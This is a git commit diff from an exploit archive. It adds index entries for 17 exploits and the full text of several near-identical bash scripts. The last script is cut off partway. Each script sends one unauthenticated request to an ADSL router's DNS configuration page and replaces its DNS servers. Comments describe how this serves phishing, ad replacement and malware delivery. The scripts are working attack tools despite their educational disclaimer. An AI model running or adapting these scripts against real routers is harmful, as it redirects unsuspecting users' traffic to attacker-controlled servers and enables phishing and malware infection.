DB: 2016-09-14

17 new exploits

Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script
Cherry Music 0.35.1 - Arbitrary File Disclosure
Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation
Windows x86 - Password Protected TCP Bind Shell (637 bytes)
wdCalendar 2 - SQL Injection
Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation
Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change

Open-Xchange App Suite 7.8.2 - Cross Site Scripting

Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting

Multiple Icecream Apps - Insecure File Permissions Privilege Escalation

WinSMS 3.43 - Insecure File Permissions Privilege Escalation

Microsoft Internet Explorer 11.0.9600.18482 - Use After Free

AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure
AIOCP 1.3.x - Multiple Vulnerabilities

ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change

COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change

Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change

PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change

PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change

Inteno EG101R1 VoIP Router - Unauthenticated DNS Change
This commit is contained in:
Offensive Security 2016-09-14 05:08:39 +00:00
parent 28e25eeea1
commit d5138d6962
21 changed files with 1943 additions and 15 deletions

View file

@ -17745,7 +17745,6 @@ id,file,description,date,author,platform,type,port
20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script",2000-11-22,"Sandro Gauci",windows,remote,0
20416,platforms/php/webapps/20416.txt,"WordPress Plugin Mz-jajak 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0
20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0
@ -18949,6 +18948,12 @@ id,file,description,date,author,platform,type,port
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
21671,platforms/unix/remote/21671.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
40347,platforms/unix/remote/40347.txt,"Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
40361,platforms/php/webapps/40361.py,"Cherry Music 0.35.1 - Arbitrary File Disclosure",2016-09-13,feedersec,php,webapps,80
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
@ -25454,6 +25459,7 @@ id,file,description,date,author,platform,type,port
28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0
28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - TSUserEX.dll ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0
28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0
40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0
28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0
28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
@ -25565,6 +25571,7 @@ id,file,description,date,author,platform,type,port
28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - rightbar.php suser Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - open_tickets.php ticket_id Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php' cons_page_title Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0
28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0
28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0
28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0
@ -25658,6 +25665,7 @@ id,file,description,date,author,platform,type,port
28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0
28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - maillist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0
28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet - in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0
40376,platforms/windows/local/40376.txt,"Multiple Icecream Apps - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - updateuser Servlet in_name Parameter Cross-Site Scripting",2006-09-20,"Tan Chew Keong",jsp,webapps,0
28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 - imgen.php Root Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0
28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - admin/config.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0
@ -25727,6 +25735,7 @@ id,file,description,date,author,platform,type,port
28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 - Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
40375,platforms/windows/local/40375.txt,"WinSMS 3.43 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",multiple,remote,0
28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service",2006-09-28,"Noam Rathaus",multiple,dos,0
28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0
@ -25900,6 +25909,7 @@ id,file,description,date,author,platform,type,port
28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0
28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0
28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0
40374,platforms/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos,0
28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0
28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0
28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0
@ -25973,7 +25983,7 @@ id,file,description,date,author,platform,type,port
28932,platforms/php/webapps/28932.txt,"AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
28933,platforms/php/webapps/28933.txt,"AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
28934,platforms/php/webapps/28934.txt,"AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - Multiple Vulnerabilities",2006-11-06,"laurent gaffie",php,webapps,0
28936,platforms/php/webapps/28936.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0
@ -26030,6 +26040,7 @@ id,file,description,date,author,platform,type,port
28990,platforms/asp/webapps/28990.txt,"INFINICART - sendpassword.asp email Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0
28991,platforms/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0
28992,platforms/asp/webapps/28992.txt,"INFINICART - browse_group.asp groupid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
40373,platforms/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
28993,platforms/asp/webapps/28993.txt,"INFINICART - added_to_cart.asp ProductID Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
28994,platforms/asp/webapps/28994.txt,"INFINICART - browsesubcat.asp Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
28995,platforms/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,php,webapps,80
@ -26137,6 +26148,7 @@ id,file,description,date,author,platform,type,port
29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0
40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0
29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0
29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
@ -26232,6 +26244,7 @@ id,file,description,date,author,platform,type,port
29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - products.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0
29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - _404_not_found.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - _410_stats_gone.page.php app_name Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
40371,platforms/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - _referer_spam.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - polls.php SQL Injection",2006-11-30,ajann,php,webapps,0
@ -26341,6 +26354,7 @@ id,file,description,date,author,platform,type,port
29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0
29332,platforms/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0
29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - Grup Variable SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0
40370,platforms/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29334,platforms/cfm/webapps/29334.txt,"Future Internet - index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0
29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0
29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0
@ -26423,6 +26437,7 @@ id,file,description,date,author,platform,type,port
29413,platforms/php/webapps/29413.txt,"Magic Photo Storage Website - admin/delete_member.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
29414,platforms/php/webapps/29414.txt,"Magic Photo Storage Website - admin/index.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
29415,platforms/php/webapps/29415.txt,"Magic Photo Storage Website - admin/list_members.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
40369,platforms/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29416,platforms/php/webapps/29416.txt,"Magic Photo Storage Website - admin/membership_pricing.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
29417,platforms/php/webapps/29417.txt,"Magic Photo Storage Website - admin/send_email.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
29418,platforms/php/webapps/29418.txt,"Magic Photo Storage Website - include/config.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
@ -26493,6 +26508,7 @@ id,file,description,date,author,platform,type,port
29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal Information Disclosure",2007-01-17,DPR,windows,remote,0
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0
29496,platforms/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal",2007-01-18,"Elliot Kendall",linux,remote,0

Can't render this file because it is too large.

82
platforms/cgi/webapps/40367.sh Executable file
View file

@ -0,0 +1,82 @@
#!/bin/bash
#
# Exper EWM-01 ADSL/MODEM
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Exper EWM-01 ADSL MODEM/ROUTER"
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

82
platforms/cgi/webapps/40368.sh Executable file
View file

@ -0,0 +1,82 @@
#!/bin/bash
#
# Inteno EG101R1 VoIP Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Inteno EG101R1 VoIP Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

81
platforms/cgi/webapps/40369.sh Executable file
View file

@ -0,0 +1,81 @@
#!/bin/bash
#
# PIKATEL 96338WS, 96338L-2M-8M Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PIKATEL 96338WS, 96338L-2M-8M ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

82
platforms/cgi/webapps/40370.sh Executable file
View file

@ -0,0 +1,82 @@
#!/bin/bash
#
# PLANET VDR-300NU ADSL ROUTER
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " PLANET VDR-300NU ADSL ROUTER "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1

82
platforms/cgi/webapps/40371.sh Executable file
View file

@ -0,0 +1,82 @@
#!/bin/bash
#
# Tenda ADSL2/2+ Modem 963281TAN
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda ADSL2/2+ Modem 963281TAN "
